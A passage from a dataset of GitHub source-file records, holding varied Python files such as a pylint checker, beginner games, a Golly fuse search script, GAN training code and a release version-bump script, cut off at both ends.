i in range(1, N):\r\n\t\tif rb == b[N+i]:\r\n\t\t\tr = i\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\trb = b[N+i]\r\n\tif r == int(1e9) and l == int(1e9):\r\n\t\tif N % 2 == 1:\r\n\t\t\treturn b[N]\r\n\t\telse:\r\n\t\t\treturn not b[N]\r\n\telse:\r\n\t\tif r < l:\r\n\t\t\treturn rb\r\n\t\telse:\r\n\t\t\treturn lb\r\n\r\n# ?????????????\r\ndef binarySearch(small, big):\r\n\tmid = (big + small) // 2\r\n\tif big - small <= 1:\r\n\t\tif check(small): return small\r\n\t\telse: return big\r\n\telse:\r\n\t\tif not check(mid):\r\n\t\t\treturn binarySearch(small, mid)\r\n\t\telse:\r\n\t\t\treturn binarySearch(mid, big)\r\n\r\nprint(binarySearch(2, 2*N-2))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc006/D/957926.py","file_name":"957926.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"11938060595","text":"\"\"\"Checker which checks whether random seed is set in pytorch dataloader\"\"\"\nfrom pylint.interfaces import IAstroidChecker\nfrom pylint.checkers import BaseChecker\nimport astroid\n\nfrom dslinter.utils.exception_handler import ExceptionHandler\n\n\nclass RandomnessControlDataloaderPytorchChecker(BaseChecker):\n \"\"\"Checker which checks whether random seed is set in pytorch dataloader\"\"\"\n __implements__ = IAstroidChecker\n\n name = \"randomness-control-dataloader-pytorch\"\n priority = -1\n msgs = {\n \"W5512\": (\n \"The worker_init_fn() and generator is not set in PyTorch DataLoader API\",\n \"randomness-control-dataloader-pytorch\",\n \"Use worker_init_fn() and generator in 
PyTorch DataLoader API to preserve reproducibility\"\n )\n }\n options = ()\n\n _import_dataloader = False\n\n def visit_importfrom(self, importfrom_node: astroid.ImportFrom):\n \"\"\"\n Check whether there is DataLoader imported.\n \"\"\"\n try:\n if(\n hasattr(importfrom_node, \"modname\")\n and importfrom_node.modname == \"torch.utils.data\"\n and hasattr(importfrom_node, \"names\")\n ):\n for name, _ in importfrom_node.names:\n if name == \"DataLoader\":\n self._import_dataloader = True\n except: # pylint: disable = bare-except\n ExceptionHandler.handle(self, importfrom_node)\n\n def visit_call(self, node: astroid.Call):\n \"\"\"\n Check whether there is a rule violation.\n :param node:\n \"\"\"\n try:\n if self._use_dataloader_from_import(node) or self._use_dataloader_from_torch(node):\n # In dataloader, check if \"worker_init_fn\" and \"generator\" is set.\n keywords = []\n if hasattr(node, \"keywords\"):\n for k in node.keywords:\n if hasattr(k, \"arg\"):\n keywords.append(k.arg)\n if \"worker_init_fn\" not in keywords or \"generator\" not in keywords:\n self.add_message(\"randomness-control-dataloader-pytorch\", node=node)\n except: # pylint: disable = bare-except\n ExceptionHandler.handle(self, node)\n\n def _use_dataloader_from_import(self, node):\n # Dataloader has been imported from torch.utils.data\n if(\n self._import_dataloader is True\n and hasattr(node.func, \"name\")\n and node.func.name == \"DataLoader\"\n ):\n return True\n return False\n\n def _use_dataloader_from_torch(self, node):\n # Dataloader has not been imported from torch.utils.data\n full_expr = \"\"\n if hasattr(node, \"func\"):\n node = node.func\n while hasattr(node, \"expr\"):\n if hasattr(node, \"attrname\"):\n full_expr = node.attrname + \".\" + full_expr\n node = node.expr\n if hasattr(node, \"name\"):\n full_expr = node.name + \".\" + full_expr\n if full_expr[:-1] == \"torch.utils.data.DataLoader\":\n return True\n return False\n","repo_name":"SERG-Delft/dslinter","sub_path":"dslinter/checkers/randomness_control_dataloader_pytorch.py","file_name":"randomness_control_dataloader_pytorch.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"38936385478","text":"import machine\nimport time\nimport _thread\n\n\nclass SlowWdt:\n def __init__(self, expiration_ms: int):\n self.lock = _thread.allocate_lock()\n self._start_ms: int = None\n self._expiration_ms = expiration_ms\n\n def __enter__(self):\n with self.lock:\n self._expiration_ms = expiration_ms\n self._start_ms = time.now()\n\n def __exit__(self, *exc):\n with self.lock:\n self._start_ms = None\n\n def feed(self):\n with self.lock:\n duration_ms = time.ticks_diff(time.ticks_ms(), self._start_ms)\n if duration_ms > self._expiration_ms:\n print(f\"SlowWdt() reset after {duration_ms}ms\")\n # Give time to flush print buffer\n time.sleep(0.1)\n machine.reset()\n","repo_name":"petermaerki/2023_filament_dryer_git","sub_path":"software/micropython/utils_wdt_slow.py","file_name":"utils_wdt_slow.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5542822225","text":"# 练习:随机加法考试题 2 + 10 = ?\n# 随机产生两个数字,在控制台中获取两个数相加的结果\n# 如果输入正确,得10分,如果输入错误,扣5分。\n# 总共3道题,最后输出总分.\n\n# 生成随机数的工具\nimport random\n\nscore = 0\nfor i in range(3): # 0 1 2\n # 产生一个随机数\n random_number01 = random.randint(1, 100)\n random_number02 = random.randint(1, 100)\n result = 
int(input(str(random_number01) + \"+\" + str(random_number02) + \"=?:\"))\n # 如果答对了\n if random_number01 + random_number02 == result:\n score += 10\n else:\n score -= 5\n\nprint(\"总分是:\" + str(score))\n","repo_name":"chang821606/storebook","sub_path":"python_base/code/day04/exercise06.py","file_name":"exercise06.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15318440848","text":"# coding=utf-8\n\nimport random\n\ndef guess_game():\n correct = False\n num_guess = 0\n print(\"Welcome to the guess game!\")\n print(\"I am thinking of a number between 1-10 and you have 3 guesses to get it!\")\n number = random.randint(0, 10)\n while not correct and num_guess < 3:\n guess = input(\"Pick a number between 1 and 10 \")\n guess = int(guess)\n if guess < number:\n print(\"that is too low!\")\n num_guess += 1\n if guess > number:\n print(\"that is too high!\")\n num_guess += 1\n if guess == number:\n correct = True\n\n if correct == False:\n print(\"Sorry! You are out of guesses. I was thinking of the number \" + str(number) + \" Better luck next time!\")\n if correct == True:\n print(\"Correct! The number was \" + str(number))\n\nguess_game()\n","repo_name":"MattCareycode/Simple-Python-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"967441582","text":"def largestRectangleArea(heights):\n\tstack = []\n\tmaxArea = 0\n\tn = len(heights)\n\n\tfor i in range(n):\n\t\twhile stack and heights[i] < heights[stack[-1]]:\n\t\t\theight = heights[stack.pop()]\n\t\t\twidth = i if not stack else i - stack[-1] - 1\n\t\t\tarea = height * width\n\t\t\tmaxArea = max(maxArea, area)\n\n\t\tstack.append(i)\n\n\twhile stack:\n\t\theight = heights[stack.pop()]\n\t\twidth = n if not stack else n - stack[-1] - 1\n\t\tarea = height * width\n\t\tmaxArea = max(maxArea, area)\n\n\treturn maxArea\n\n\nhistogram = [2, 1, 5, 6, 2, 3, 9, 9]\nprint(largestRectangleArea(histogram))","repo_name":"AffectEngine/Algorythms_Roadmap","sub_path":"2. 
Stack/2.7 Largest Rectangle in Histogram.py","file_name":"2.7 Largest Rectangle in Histogram.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17579824502","text":"from json import loads\nfrom argparse import ArgumentParser\nfrom csv import DictWriter\n\nparser = ArgumentParser(\"jsonl2csv\")\nparser.add_argument(\"--input\", required=True)\nparser.add_argument(\"--output\", required=True)\nargs = parser.parse_args()\n\nif __name__ == \"__main__\":\n lines, keys = [], set()\n with open(args.input, \"r\") as f:\n for line in f.readlines():\n try:\n line = loads(line)\n lines.append(line)\n keys.update(line.keys())\n except:\n pass\n\n with open(args.output, \"w\") as f:\n writer = DictWriter(f, keys)\n writer.writeheader()\n for line in lines:\n writer.writerow(line)","repo_name":"csmith49/tron","sub_path":"jsonl_to_csv.py","file_name":"jsonl_to_csv.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14822305499","text":"# Owner(s): [\"oncall: jit\"]\n\nimport os\nimport sys\n\nimport torch\nfrom torch.testing import FileCheck\n\n# Make the helper files in test/ importable\npytorch_test_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nsys.path.append(pytorch_test_dir)\nfrom torch.testing._internal.jit_utils import JitTestCase\n\nif __name__ == '__main__':\n raise RuntimeError(\"This test file is not meant to be run directly, use:\\n\\n\"\n \"\\tpython test/test_jit.py TESTNAME\\n\\n\"\n \"instead.\")\n\nclass TestFunctionalBlocks(JitTestCase):\n def test_subgraph_creation(self):\n def fn(x, y, z):\n x = x + 1\n y = y + 1\n z = z + 1\n z.add_(2)\n z = z * z\n y = y * z\n if y < 2:\n y = y + 5\n return x + y + z\n\n graph = torch.jit.script(fn).graph\n self.run_pass('create_functional_graphs', graph)\n\n # all uses of x and y should be sunk\n FileCheck().check(r\"%x\").check_not(r\"%x\").check(\"FunctionalGraph\").check(r\"%x\").run(graph)\n FileCheck().check(r\"%y\").check_not(r\"%y\").check(\"FunctionalGraph\").check(r\"%y\").run(graph)\n\n # Don't allow any outputs which escape scope, so there is one final addition in the graph\n FileCheck().check(\"Tensor = prim::Functional\").check_next(\"aten::add\").run(graph)\n\n # z + 1, z.add_(2) considered non functional, z = z * z should be considered functional\n FileCheck().check(\"add\").check(\"add_\").check_not(\"mul\").check(\"FunctionalGraph\").run(graph)\n","repo_name":"pytorch/pytorch","sub_path":"test/jit/test_functional_blocks.py","file_name":"test_functional_blocks.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"38769344548","text":"# codeholic's FuseFinder script v0.2.0\n# Creates a new layer called \"FuseTestLayer\"\n# Writes to a FuseFinder subfolder in Golly's data directory.\n# Updates screen every hundred trials (why not?)\n# Uses g.new() as per simsim314's suggestion\n# (I noticed that Golly's Undo got very slow after running the old script) (?)\n# hashsoup used instead randfill\n# report to patterns folder\n#SEED for datetime.now\nimport golly as g\nimport os\nimport time\nimport hashlib\nimport datetime\nimport itertools\nimport math\n\nMAX_FUSE_PACE = 10 # how many ticks it takes to burn one cell\nMAX_FUSE_LENGTH = 1000 # how long the test fuse is\nMAX_IGNITION_TIME = 1000 # how long we wait 
for a fuse to be ignited\nBASE = 16\n\nstep = int(math.log(MAX_FUSE_PACE * MAX_FUSE_LENGTH + MAX_IGNITION_TIME, BASE) + 0.5)\n\noutpath=os.path.join(g.getdir(\"patterns\"),\"FuseFinder\")\nif not os.path.isdir(outpath): os.mkdir(outpath)\n\nFUSENAME = \"Diagpuffer\"\n\nselrect = g.getselrect()\nif not selrect:\n g.exit('Select a fuse monomer.')\n\nmonomer = g.getcells(selrect)\nif not monomer:\n g.exit('Selected region is empty.')\n\noffset = int(g.getstring(\"Enter horizontal offset:\", \"0\"))\n\nseed = g.getstring(\"Enter soup seed:\", str(datetime.datetime.now()))\n\nfor i in range(g.numlayers()):\n if g.getname(i)==\"FuseTestLayer\":\n r=g.getrect()\n if r is not []:\n g.select(r)\n g.clear(0)\n break\nif not g.getname(i)==\"FuseTestLayer\": g.addlayer()\n\ng.setalgo('QuickLife')\n\nx0, y0, width, height = selrect\nfor dx, dy in zip((i * offset for i in itertools.count(0)), range(0, MAX_FUSE_LENGTH, height)):\n g.putcells(monomer, dx, -dy)\n\nTESTRECT = [x0 + dx, y0 - dy, width, height]\n\nallcells=g.getcells(g.getrect())\ncells = g.getcells(TESTRECT)\n\nSOUP_SIZE = 16\nSOUPSPERDISPLAY = 100\n\ndef hashsoup(instring):\n s = hashlib.sha256(instring).digest()\n thesoup = []\n for j in xrange(32):\n t = ord(s[j])\n for k in xrange(8):\n if (t & (1 << (7 - k))):\n thesoup.append(k + 8*(j % 2))\n thesoup.append(int(j / 2))\n\n return thesoup\n\ndef patterns_identical(cells1, cells2):\n if len(cells1) != len(cells2):\n return False\n return set(zip(cells1[::2], cells1[1::2])) == set(zip(cells2[::2], cells2[1::2]))\n\ncount, found = 0, 0\n\nstart_time = time.clock()\n\n# For profiling\n#\n#init_time = 0\n#gen_time = 0\n#check_time = 0\n\n\nwhile True:\n #mark = time.clock()\n g.new(\"FuseTestLayer\")\n g.putcells(allcells)\n g.putcells(hashsoup(seed + str(count)), x0 + (width - SOUP_SIZE) / 2, y0 + height)\n #init_time += time.clock()-mark\n #mark = time.clock()\n g.setbase(BASE)\n g.setstep(step)\n\n #gen_time +=time.clock()-mark\n #mark = time.clock()\n changed = True\n for _ in range(0, 2):\n g.step()\n test = g.getcells(TESTRECT)\n if patterns_identical(test, cells):\n changed = False\n break\n\n count += 1\n\n if changed:\n g.reset()\n g.save(os.path.join(outpath, FUSENAME + str(count) + '.rle'), 'rle')\n g.show(\"Saved fuse to \" + outpath + FUSENAME + str(count) + \".rle\")\n found += 1\n\n if count % SOUPSPERDISPLAY == 0:\n end_time =time.clock()\n g.show('Count:' + str(count) + ' Found:' + str(found) + ' (' +\\\n str(round(SOUPSPERDISPLAY/(end_time - start_time), 2)) + \" soups per second)\")\n #g.show('init: '+str(init_time*1000/count)+'ms gen: '+str(gen_time*1000/count)+'ms check: '+str(check_time*1000/count)+'ms')\n start_time = end_time\n g.setmag(2)\n g.update()\n #check_time += time.clock()-mark\n","repo_name":"conwaylife/fuse-finder","sub_path":"fuse-finder.py","file_name":"fuse-finder.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42912638568","text":"from exec_utilities import time_out_util\nfrom exec_utilities.exec_utils import *\n\n\ndef run_exp():\n our_exec_path = '/homes/ywangby/workspace/yche/new-git-repos-yche/SimRank/SPS-Variants/READS/build'\n data_set_lst = [\n # 'ca-GrQc', 'ca-HepTh', 'p2p-Gnutella06', 'wiki-Vote',\n # 'email-Enron', 'email-EuAll', 'web-NotreDame', 'web-Stanford',\n # 'web-BerkStan', 'web-Google',\n # 'cit-Patents', 'soc-LiveJournal1',\n # 'wiki-Link',\n 'digg-friends',\n 'flickr-growth',\n ]\n dynamic_exec_tag_lst = [\n 
'reads-rq-dynamic-del',\n        'reads-rq-dynamic-exp',\n        # 'reads-d-dynamic-del',\n        # 'reads-d-dynamic-exp',\n    ]\n\n    def one_round():\n        for exec_name in dynamic_exec_tag_lst:\n            for data_set_name in data_set_lst:\n                algorithm_path = our_exec_path + os.sep + exec_name\n                statistics_file_path = 'exp_results/' + exec_name + '_dynamic_update_time_' + str(\n                    insert_edge_num) + '_0407.txt'\n                params_lst = map(str, [algorithm_path, data_set_name, '>>', statistics_file_path])\n                cmd = ' '.join(params_lst)\n                time_out = 72000\n                tle_flag, info, correct_info = time_out_util.run_with_timeout(cmd, timeout_sec=time_out)\n                write_split(statistics_file_path)\n\n                with open(statistics_file_path, 'a+') as ifs:\n                    ifs.write(correct_info)\n                    ifs.write(my_splitter + time.ctime() + my_splitter)\n                    ifs.write('is_time_out:' + str(tle_flag))\n                    ifs.write('\\n\\n\\n\\n')\n\n    insert_edge_num = 1000\n    one_round()\n\n\nif __name__ == '__main__':\n    run_exp()\n","repo_name":"RapidsAtHKUST/SimRank","sub_path":"python_experiments/run_vldbj_experiments/run_reads_dynamic_update.py","file_name":"run_reads_dynamic_update.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"10658532423","text":"class Entity:\n    \"\"\"\n    A generic entity object. Entities are anything that is interact-able that isn't the map itself.\n\n    Examples: Players, enemies, items, etc.\n    \"\"\"\n    def __init__(self, x, y, char, color, name):\n        self.x = x\n        self.y = y\n        self.char = char\n        self.color = color\n        self.name = name\n","repo_name":"ali-imad/TowerOfElbiz","sub_path":"entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37787037065","text":"#3 Exception class for checking the data type of a list element\nclass OwnError(Exception):\n    def __init__(self, txt):\n        self.txt = txt\n\nnumbers = []\na = input(\"Enter a number: \")\nwhile a != 'stop':\n    try:\n        if a.isdigit():\n            numbers.append(a)\n        else:\n            raise OwnError('Only numbers may be entered!')\n    except OwnError as err:\n        print(err)\n    finally:\n        a = input(\"Enter a number: \")\n\nprint(numbers)\n\n\n\n\n","repo_name":"GladkovArtem/GB_Gladkov_Artem","sub_path":"DZ11_3_Gladkov_Artem.py","file_name":"DZ11_3_Gladkov_Artem.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17029740926","text":"import graph_tool as gt\n\ndef int_conv(n):\n    lead = n.find('-', 8)\n    num = int(n[8:lead])*10000\n    num += int(n[lead+1:])\n    return num\n\nf = open('edges.txt', 'r')\ng = gt.Graph(directed=True)\n\nfor line in f:\n    u,v = line.split('\\t')\n    u = int_conv(u)\n    v = int_conv(v)\n    g.add_edge(u,v)\n    g.add_edge(v,u)\n\ng.save('favites.gt')\n\n","repo_name":"reyna-abhyankar/missing-nodes-covid","sub_path":"favites_pkl/favites_to_gt.py","file_name":"favites_to_gt.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8438865468","text":"from sys import stdin\n\ndef reverse_string(string):\n    '''Function will return reverse string.'''\n    return string[::-1]\n\n\ndef only_alphanum_string(string):\n    '''Function will return only alpha-numeric string.'''\n    new_str = ''\n    for i in string:\n        if i.isalnum():\n            new_str += i\n    return new_str\n\n\ndef is_palindrom(string):\n    '''Function will check the string is palindrome or not.'''
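\n    # keep only alphanumeric characters, then compare the cleaned string with its reverse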
\n    alpha_numeric_string = only_alphanum_string(string)\n    rev_str = reverse_string(alpha_numeric_string)  # reverse the cleaned string, not the raw input\n    if alpha_numeric_string == rev_str:\n        return 'true'\n    else:\n        return 'false'\n\n\n# Driver Code\nif __name__ == '__main__':\n    string = input().strip()\n    result = is_palindrom(string)\n    print(result)","repo_name":"Sam21sop/Coding_Ninjas_2023","sub_path":"00_Career_Camp_Introduction_To_Python/12_String/StringPalindrome.py","file_name":"StringPalindrome.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36150669804","text":"#!/usr/bin/env python\n\n# Plotting imports\nimport matplotlib.pylab as pylab\nfrom matplotlib.font_manager import FontProperties\n# Logging imports\nimport logging\n\nclass BarChart:\n\n    def __init__(self):\n        # Appearance variables\n        self._font = {'family':'serif', 'color':'black', 'weight':'normal', 'size':'12',}\n        self._colors = 'rgbcmyk'\n        # Labels\n        self._title = 'Figure'\n        self._xLabel = 'X-Axis'\n        self._yLabel = 'Y-Axis'\n        self._saveName = 'fig.png'\n        self._saveFig = False\n        # Data\n        self._xData = {}\n        self._yData = {}\n        self._categoryData = {}\n        # Legend\n        self._usingLegend = False\n        self._legendTitle = ''\n        self._legendLocation = 'center right'\n        self._legendLabelSpacing = 0.0\n        self._legendFontProps = FontProperties()  # name must match setLegend() and plot(), which use _legendFontProps\n        self._legendBboxToAnchor = None\n        self._logger = logging.getLogger('Plot_Logger')\n        self._logger.addHandler(logging.StreamHandler())\n        self._logger.debug('Finished BarChart __init__()')\n\n    def setColors(self, colors):\n        self._colors = colors\n        self._logger.debug('Setting bar colors')\n\n    def setLogLevel(self, logLevel):\n        self._logger.setLevel(logLevel)\n\n    def setLegend(self, legendTitle='Legend', legendLocation='center top',\n                  labelspacing=0.0, fontProp=FontProperties(), bbox_to_anchor=None):\n        self._usingLegend = True\n        self._legendTitle = legendTitle\n        self._legendLocation = legendLocation\n        self._legendLabelSpacing = labelspacing\n        self._legendFontProps = fontProp\n        self._legendBboxToAnchor = bbox_to_anchor\n        self._logger.debug('Set legend parameters')\n\n    def setFont(self, font):\n        self._font = font\n        self._logger.debug('Setting font')\n\n    def setXData(self, xData):\n        self._xData = xData\n        self._logger.debug('Setting x-data')\n\n    def setYData(self, yData):\n        self._yData = yData\n        self._logger.debug('Setting y-data')\n\n    def setCategoryData(self, categoryData):\n        self._categoryData = categoryData\n        self._logger.debug('Setting category data')\n\n    def setData(self, xData, yData, categoryData):\n        self.setXData(xData)\n        self.setYData(yData)\n        self.setCategoryData(categoryData)\n        self._logger.debug('Setting x, y and category data')\n\n    def setTitle(self, title):\n        self._title = title\n        self._logger.debug('Setting plot title')\n\n    def setXLabel(self, xLabel):\n        self._xLabel = xLabel\n        self._logger.debug('Setting x-axis label')\n\n    def setYLabel(self, yLabel):\n        self._yLabel = yLabel\n        self._logger.debug('Setting y-axis label')\n\n    def setTitleAndLabels(self, title, xLabel, yLabel):\n        self.setTitle(title)\n        self.setXLabel(xLabel)\n        self.setYLabel(yLabel)\n        self._logger.debug('Setting title and axis labels')\n\n    def setSaveName(self, saveName):\n        self._saveName = saveName\n        self._logger.debug('Setting save name')\n\n    def savePlotAs(self, imageName):\n        self.setSaveName(imageName)\n        self._saveFig = True\n\n    def readyToPlot(self):\n        if (self._xData == {} or self._yData == {} or self._categoryData == {}):\n            return False\n        else:\n            return True\n\n    def plot(self):
\n        # one bar group per category; bars at each x position are offset by bar_width\n        self._logger.debug('plotting')\n        colors = self._colors[:(len(self._categoryData))]\n        ind = pylab.arange(len(self._xData))\n        bar_width = 1.0 / (len(self._categoryData) + 1)\n        bar_groups = []\n\n        for c in range(len(self._categoryData)):\n            bars = pylab.bar(ind+c*bar_width, self._yData[c], bar_width, color=colors[c % len(colors)])\n            bar_groups.append(bars)\n\n        pylab.xticks(ind+bar_width, self._xData)\n        if (self._usingLegend):\n            pylab.legend([b[0] for b in bar_groups], self._categoryData,\n                         title = self._legendTitle, loc = self._legendLocation,\n                         labelspacing = self._legendLabelSpacing,\n                         prop = self._legendFontProps, bbox_to_anchor = self._legendBboxToAnchor)\n\n        pylab.xlabel(self._xLabel, fontdict=self._font)\n        pylab.ylabel(self._yLabel, fontdict=self._font)\n        pylab.title(self._title, fontdict=self._font)\n        if(self._saveFig):\n            self._logger.debug('Saving plot as {}'.format(self._saveName))\n            pylab.savefig(self._saveName)\n\n        pylab.show()\n","repo_name":"petevieira/ns3-sims","sub_path":"scripts/pvplot.py","file_name":"pvplot.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3920601588","text":"import os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom modules import RCGAN, Discriminator\nimport hparams as hp\nimport numpy as np\nimport pandas as pd\nfrom utils import *\nfrom torch.utils.data import DataLoader\nimport random\n\n\ndef validate(model, discriminator, val_loader, writer, iteration):\n    model.eval()\n    discriminator.eval()\n    with torch.no_grad():\n        n_data, val_loss_d, val_loss_g = 0, 0, 0\n        for i, batch in enumerate(val_loader):\n            targets, target_labels = [ x.cuda(non_blocking=True) for x in batch ]\n            n_data += len(targets)\n            preds = model(target_labels)\n\n            y, y_hat = discriminator(targets, preds.detach(), target_labels)\n            loss_d = ((1-y)**2 + y_hat**2).mean()\n\n            _, y_hat = discriminator(targets, preds, target_labels)\n            loss_g = ((1-y_hat)**2).mean()\n\n            val_loss_d += loss_d.item() * len(targets)\n            val_loss_g += loss_g.item() * len(targets)\n\n        val_loss_d /= n_data\n        val_loss_g /= n_data\n\n    model.train()\n    discriminator.train()\n\n    val_loss_mmd = MMD(preds, targets).item()\n    writer.add_scalar('losses_val/loss_mmd', val_loss_mmd, global_step=iteration)\n    writer.add_scalar('losses_val/loss_d', val_loss_d, global_step=iteration)\n    writer.add_scalar('losses_val/loss_g', val_loss_g, global_step=iteration)\n\n    idx = random.randrange(len(targets))\n    for i in range(hp.orig_dim):\n        fig = plot_image(preds[idx, :, i].detach().cpu(), targets[idx, :, i].detach().cpu())\n        writer.add_figure(f'plots_{i}/val', fig, global_step=iteration)\n\n\ndef main(hp, args):\n    pid_list = os.listdir(\"./Dataset/physionet.org/files/eicu-crd/2.0/preprocessed/sequences\")\n    random.seed(1234)\n    random.shuffle(pid_list)\n    train_pid = pid_list[:int(0.8*len(pid_list))]\n    val_pid = pid_list[int(0.8*len(pid_list)):int(0.9*len(pid_list))]\n    test_pid = pid_list[int(0.9*len(pid_list)):]\n\n    seq_list = []\n    for pid in train_pid:\n        seq = np.load(f\"./Dataset/physionet.org/files/eicu-crd/2.0/preprocessed/sequences/{pid}\")\n        seq_list.append(seq)\n    mu, std = np.concatenate(seq_list, axis=0).mean(axis=0), np.concatenate(seq_list, axis=0).std(axis=0)\n\n    train_dataset = eICUDataset(train_pid, mu, std, seq_list=seq_list)\n    val_dataset = eICUDataset(val_pid, mu, std)\n    test_dataset = eICUDataset(test_pid, mu, std)\n\n    train_loader = DataLoader(train_dataset, shuffle=True,
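 # drop_last (below) discards the final incomplete batch so every batch has exactly batch_size samples\n        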
batch_size=hp.batch_size, drop_last=True)\n val_loader = DataLoader(val_dataset, batch_size=hp.batch_size)\n test_loader = DataLoader(test_dataset, batch_size=hp.batch_size)\n \n model = RCGAN(hp).cuda()\n discriminator = Discriminator(hp, conditional=True).cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=hp.learning_rate)\n optim_d = torch.optim.Adam(discriminator.parameters(), lr=hp.learning_rate, betas=[0.5, 0.9])\n writer = get_writer(hp.output_directory, args.logdir)\n\n iteration = 0\n model.train()\n discriminator.train()\n for epoch in range(1, hp.epochs+1, 1):\n for i, batch in enumerate(train_loader):\n targets, target_labels = [ x.cuda(non_blocking=True) for x in batch ]\n preds = model(target_labels)\n \n ####### Discriminator #######\n y, y_hat = discriminator(targets, preds.detach(), target_labels)\n loss_d = ((1-y)**2 + y_hat**2).mean()\n optim_d.zero_grad(set_to_none=True)\n loss_d.backward()\n optim_d.step()\n \n ####### Model #######\n _, y_hat = discriminator(targets, preds, target_labels)\n loss_g = ((1-y_hat)**2).mean()\n optimizer.zero_grad(set_to_none=True)\n loss_g.backward()\n optimizer.step()\n \n ####### Logging #######\n writer.add_scalar('losses_train/loss_d', loss_d.item(), global_step=iteration)\n writer.add_scalar('losses_train/loss_g', loss_g.item(), global_step=iteration)\n\n iteration += 1\n \n if iteration%hp.iters_per_checkpoint==0:\n save_checkpoint(model, optimizer, hp.learning_rate, iteration,\n f'{hp.output_directory}/{args.logdir}/RCGAN_checkpoint_{iteration}.pt')\n save_checkpoint(discriminator, optim_d, hp.learning_rate, iteration,\n f'{hp.output_directory}/{args.logdir}/Disc_checkpoint_{iteration}.pt')\n \n loss_mmd = MMD(preds, targets)\n writer.add_scalar('losses_train/loss_mmd', loss_mmd.item(), global_step=iteration) \n \n idx = random.randrange(len(targets))\n for i in range(hp.orig_dim):\n fig = plot_image(preds[idx, :, i].detach().cpu(), targets[idx, :, i].detach().cpu())\n writer.add_figure(f'plots_{i}/train', fig, global_step=iteration)\n \n validate(model, discriminator, val_loader, writer, iteration)\n\nif __name__ == '__main__':\n p = argparse.ArgumentParser()\n p.add_argument('--gpu', type=str, default='0')\n p.add_argument('--seed', type=int, default=0)\n p.add_argument('--logdir', type=str, required=True)\n args = p.parse_args()\n \n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n torch.set_printoptions(precision=2, sci_mode=False)\n\n main(hp, args)\n","repo_name":"jiwoohong93/ai_dep","sub_path":"medical/medical_4/train_gan.py","file_name":"train_gan.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"17826825591","text":"import argparse\nimport re\nfrom typing import Tuple\n\nfrom setup import find_version\n\n\ndef get_next_version(release_type) -> Tuple[Tuple[int, int, int], str, str]:\n current_ver = find_version(\"fairscale/version.py\")\n version_list = [int(x) for x in current_ver.strip(\"'\").split(\".\")]\n major, minor, patch = version_list[0], version_list[1], version_list[2]\n if release_type == \"patch\":\n patch += 1\n elif release_type == \"minor\":\n minor += 1\n patch = 0\n elif release_type == \"major\":\n major += 1\n minor = patch = 0\n else:\n raise ValueError(\"Incorrect release type specified. 
Acceptable types are major, minor and patch.\")\n\n    new_version_tuple = (major, minor, patch)\n    new_version_str = \".\".join([str(x) for x in new_version_tuple])\n    new_tag_str = \"v\" + new_version_str\n    return new_version_tuple, new_version_str, new_tag_str\n\n\ndef update_version(new_version_tuple) -> None:\n    \"\"\"\n    given the current version, update the version to the\n    next version depending on the type of release.\n    \"\"\"\n\n    with open(\"fairscale/version.py\", \"r\") as reader:\n        current_version_data = reader.read()\n\n    # match the whole assignment line so that only that line is replaced\n    # (match.string is the entire input, which would have clobbered the whole file)\n    version_match = re.search(r\"^__version_tuple__ .*$\", current_version_data, flags=re.MULTILINE)\n\n    if version_match:\n        new_version_data = \"__version_tuple__ = %s\" % str(new_version_tuple)\n        current_version_data = current_version_data.replace(version_match.group(0), new_version_data)\n\n        with open(\"fairscale/version.py\", \"w\") as writer:\n            writer.write(current_version_data)\n    else:\n        raise RuntimeError(\"__version_tuple__ not found in version.py\")\n\n\ndef main(args):\n    if args.release_type in [\"major\", \"minor\", \"patch\"]:\n        new_version_tuple, new_version, new_tag = get_next_version(args.release_type)\n    else:\n        raise ValueError(\"Incorrect release type specified\")\n\n    if args.update_version:\n        update_version(new_version_tuple)\n\n    print(new_version, 